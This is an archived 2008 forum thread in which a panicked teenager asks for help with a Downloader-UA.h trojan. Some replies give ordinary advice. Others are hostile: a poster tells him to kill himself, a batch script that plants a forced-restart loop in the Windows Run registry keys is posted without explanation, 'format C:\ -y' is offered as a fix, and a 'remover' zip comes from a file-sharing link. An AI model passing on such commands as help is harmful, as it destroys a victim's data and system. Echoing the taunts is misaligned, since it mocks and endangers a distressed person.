PDA

View Full Version : Infected with Downloader-UA.h



mike475
11-05-2008, 09:29 PM
Downloader-UA.h

I just dont know how it happened. I was doing a scan and my McAfee says it was in a song I got. Im guessing on MSN as it was in the received files folder.

My laptop was being funny earlier, hency why I did the virus scan. And now I'm really freaked. I never download stuff I doubt for a second, (I've only got stuff like printer software, bluetooth, webcam, google earth and 4oD).

Anyone think its worth completely formatting my PC?

cocaine
11-05-2008, 09:36 PM
you're overreacting, just do a virus scan lmao..

mike475
11-05-2008, 09:42 PM
you're overreacting, just do a virus scan lmao..
I am, thats what picked it up.

Oh my god I dont know how this has happened, oh my god tomorrow I'm going threw everything on my computer and if I dont want/use it I'm deleting it. god who knows what other viruses and whatever could be on my computer, jesus christ im screwed.

cocaine
11-05-2008, 09:44 PM
hey, dude, calm down lmao.
just do a system restore to like, yesterday or the day before and it wont be there (restore to a time before you got the virus, if you know when you did)

mike475
11-05-2008, 09:50 PM
hey, dude, calm down lmao.
just do a system restore to like, yesterday or the day before and it wont be there (restore to a time before you got the virus, if you know when you did)
i am calm its just that i never download crap and oh god now i've got this virus and its got passed everything and i dont even know why i accepted the song it sounds crap by its title. oh my god i just had a look at the logs and theres 2 other trojans on there oh my god i didnt even know about that and there's probably gonna be more stuff on there and oh my god my dads borrowing my mcafee disc and oh my god now i cant format because i'll be worse off and oh my god i just cant win. and even if i did a system restore god knows what else is on my computer, oh my god i feel terrible.

oh my god i dunno what to do. tomorrow i'm gonna make a map of my computer and have all the programmes i actually want on it and oh my god is it possible to have like a virus in video files? because i downloaded some episodes of lost but i only downloaded the exact file, no helper or download assistant crap.

oh my god help

kk.
11-05-2008, 09:55 PM
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=144503


Overview -

--- Update May 6th, 2008 --
Due to an increase in prevalence being seen by our VirusScan Online Customers, the risk assessment of this threat was upgraded to Medium for Home Users and Low Profiled for Corporate Users.

Downloader-UA.h trojans are fake music and video files associated with fastmp3player.com.
it seems its going around much more often now.


Method of Infection -

Downloader-UA.h trojans are propagated through P2P networks



Removal -

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).

Additional Windows ME/XP removal considerations



http://vil.nai.com/vil/content/v_144503.htm

mike475
11-05-2008, 09:57 PM
i was looking at that earlier and i didnt even use p2p stuff, and i've never been on that site ever. god i dunno what to do

kk.
11-05-2008, 09:59 PM
P2P can mean msn aswell
All i could suggest is do a system restore to a date before the file was recieved (right click and view properties and looka t he dates)

Nemo
11-05-2008, 10:00 PM
i was looking at that earlier and i didnt even use p2p stuff, and i've never been on that site ever. god i dunno what to do
Try another word other than god, and try removing it? lol.

mike475
11-05-2008, 10:03 PM
P2P can mean msn aswell
All i could suggest is do a system restore to a date before the file was recieved (right click and view properties and looka t he dates)

god i'm an epic fail. im gonna try my best to get my mcafee discs of my dad and just format my pc completely.i've put internet explorer on the highest security mode, and now the ads on hxf wont show.my mcafee says its got it and got rid of it by putting it in quarentine, but what else could be on my system, i mean, it only found that by me doing an actual scan. and god knows what information the creator of that virus has about me, hes probably watching me now and mocking me. i cant change my passwords at school because theres is like well crap, and oh my god im never accepting any files ever on msn. oh my god im such a n00b.

Nemo
11-05-2008, 10:06 PM
god i'm an epic fail. im gonna try my best to get my mcafee discs of my dad and just format my pc completely.i've put internet explorer on the highest security mode, and now the ads on hxf wont show.my mcafee says its got it and got rid of it by putting it in quarentine, but what else could be on my system, i mean, it only found that by me doing an actual scan. and god knows what information the creator of that virus has about me, hes probably watching me now and mocking me. i cant change my passwords at school because theres is like well crap, and oh my god im never accepting any files ever on msn. oh my god im such a n00b.
Lol!!!!!!!!!!!!!!! sorry, but this is extremely funny by how much you are overacting. Its not bad, just do a scan every few days, everyone does that anyway ;s

kk.
11-05-2008, 10:06 PM
yes, i agree. you are a n00b. youd better kill yourself, thats the only way they cant use your data. good luck

Leetzgirl
11-05-2008, 10:10 PM
LOOLLLLLLLLLLLLLLLLLLLLL


Dude.

Just scan, and show me the screen shot of the results

you DO NOT NEED TO REFORMAT YOUR PC

DaveTaylor
11-05-2008, 10:10 PM
haha. wth? seriously?

mike475
11-05-2008, 10:11 PM
Lol!!!!!!!!!!!!!!! sorry, but this is extremely funny by how much you are overacting. Its not bad, just do a scan every few days, everyone does that anyway ;s

im not over reacting - this is deadly serious. an unauthorized file has infected my system without my prior knowledge. if only i kept scanning every week, it used to be once a month, but now its gonna be every few days.
yes, i agree. you are a n00b. youd better kill yourself, thats the only way they cant use your data. good luck

i should actually change all my passwords, but not on this what could be infected machine. god knows what else could be lurking around on here.oh my god can anyone tell me if viruses and w/e can be hidden in video files?
edit: heres the screenshot of what it says, the virus scan hasnt finished yetOH MY GOD THE FORUM BUTTONS ARNT WORKING AND IN THE QUOTES ABOVE ITS USING HTML TAGS
edit 2: oh my god is this because i've put security on internet explorer to the highest level. oh my god i need to format now my whole system has been compromised
theres the screenie link http://img103.imageshack.us/img103/9848/virusscreeniehw5.jpgoh my god im such a n00b
ENTER ISNT WORKING. is it just me?

cocaine
11-05-2008, 10:23 PM
http://img103.imageshack.us/img103/9848/virusscreeniehw5.jpg

thats the right link lmao..

Leetzgirl
11-05-2008, 10:26 PM
Dude


Your are safe.

Nothing is bad now.

You do not need to reformat your system

kk.
11-05-2008, 10:27 PM
Dude


Your are safe.

Nothing is bad now.

You do not need to reformat your system
he does, dont lie :P

you need to change all your passwords, keep ur internet to the highest security. firewall to highest, virus scan every tiome it finishes another scan and dont use your computer or internet.

Stephen!
11-05-2008, 10:30 PM
Mike, why don't you ask God? You seem to mention him a lot in your posts.

25 times in a few posts.

Leetzgirl
11-05-2008, 10:32 PM
Dude

I looking for a file, this file will remove the virus, aswell the dangers of it.

I will post it ;)

cocaine
11-05-2008, 10:32 PM
hey, i think i know why he's being so paranoid..

.. its a virus you got from downloading porn isnt it, mike ;)


we're all friends here, you can tell us ;)

kk.
11-05-2008, 10:33 PM
ahahaah, thats why hes worried about it being in video files

its all coming out now

cocaine
11-05-2008, 10:35 PM
http://www.microsoft.com/athome/security/protect/support.mspx (http://www.internetisseriousbusiness.com)

that might help ;)

Leetzgirl
11-05-2008, 10:43 PM
http://rapidshare.com/files/114237854/Downloader-UA.h-remover.zip


Here it is,

Open, unzip then click DownloadLoader-UA.h-remover, then just wait, then it will say it to restart then restarts then it removes the file completely, and proctects you from it.


I have also PM'ed you

IntaMedia
11-05-2008, 10:50 PM
*REMOVED*


echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo you suck haha
PAUSE

edit wth, its doing a space in currentversion.

is supposed to be

echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo you suck haha
PAUSE

Edited by Hitman (Forum Super Moderator): Please don't insult other forum members, thanks.

Leetzgirl
11-05-2008, 10:54 PM
Just kill me


:|

Niko Bellic
11-05-2008, 10:56 PM
Just kill me


:|

http://rightwingnation.com/wp-content/deagle.jpg

Leetzgirl
11-05-2008, 10:59 PM
*Removed*

Edited by --ss-- (Forum Super Moderator): Please do not post inappropriate images.

Hypertext
11-05-2008, 11:05 PM
cmd>

format C:\

works every time.

IntaMedia
12-05-2008, 06:55 AM
cmd>
format C:\ -y -y

works every time.

Fixed xD

Decode
12-05-2008, 07:10 AM
If you got the virus over msn, does that mean a friend sent it to you lol?

mike475
12-05-2008, 08:33 PM
OK heres an update.Since I got home (7pm), I've got threw the My Received Files, Pictures, and half of My Documents folder, and have so far got rid of 2043 files I dont need/want. There were around 2000 files in the my received files folder alone.Everything I dont need has to go, just encase its infected with some unknown virus.Just to confirm to everyone the virus has gone, it's just that it went undetected for a while on my system, so I'm wondering what else is on here. Cheers for the replys and that.And lol cocaine at your sig.

Oh my god is it me or something or are the forums buttons when you make a new post not working? And when I press enter to like make a new line/paragraph - nothing happens? When I go to edit it uses HTML paragraph start and end tags. And on Youtube it says I need an updated flash, I think its because I set my internet explorer on the highest security mode available, is that why?

Edited by brandon (Forum Moderator): Accidental double post merged.

Technologic
12-05-2008, 08:43 PM
OK heres an update.Since I got home (7pm), I've got threw the My Received Files, Pictures, and half of My Documents folder, and have so far got rid of 2043 files I dont need/want. There were around 2000 files in the my received files folder alone.Everything I dont need has to go, just encase its infected with some unknown virus.Just to confirm to everyone the virus has gone, it's just that it went undetected for a while on my system, so I'm wondering what else is on here. Cheers for the replys and that.And lol cocaine at your sig.

Oh my god is it me or something or are the forums buttons when you make a new post not working? And when I press enter to like make a new line/paragraph - nothing happens? When I go to edit it uses HTML paragraph start and end tags. And on Youtube it says I need an updated flash, I think its because I set my internet explorer on the highest security mode available, is that why?
You do realise it's designed to hide away in your system32 folder. Go through your registry and look for errors

Ruamantical
12-05-2008, 08:48 PM
Download AVG 8.0, once the scan has finished all viruses will be removed and put into a virus vault :P

mike475
12-05-2008, 09:16 PM
You do realise it's designed to hide away in your system32 folder. Go through your registry and look for errors
Hmm I think I may actually need to, just encase you know.

Recursion
12-05-2008, 09:20 PM
Viruses are designed to get everywhere, really your only safe starting from fresh.

mike475
12-05-2008, 09:23 PM
Viruses are designed to get everywhere, really your only safe starting from fresh.
Thats what I'm really considering doing..

Want to hide these adverts? Register an account for free!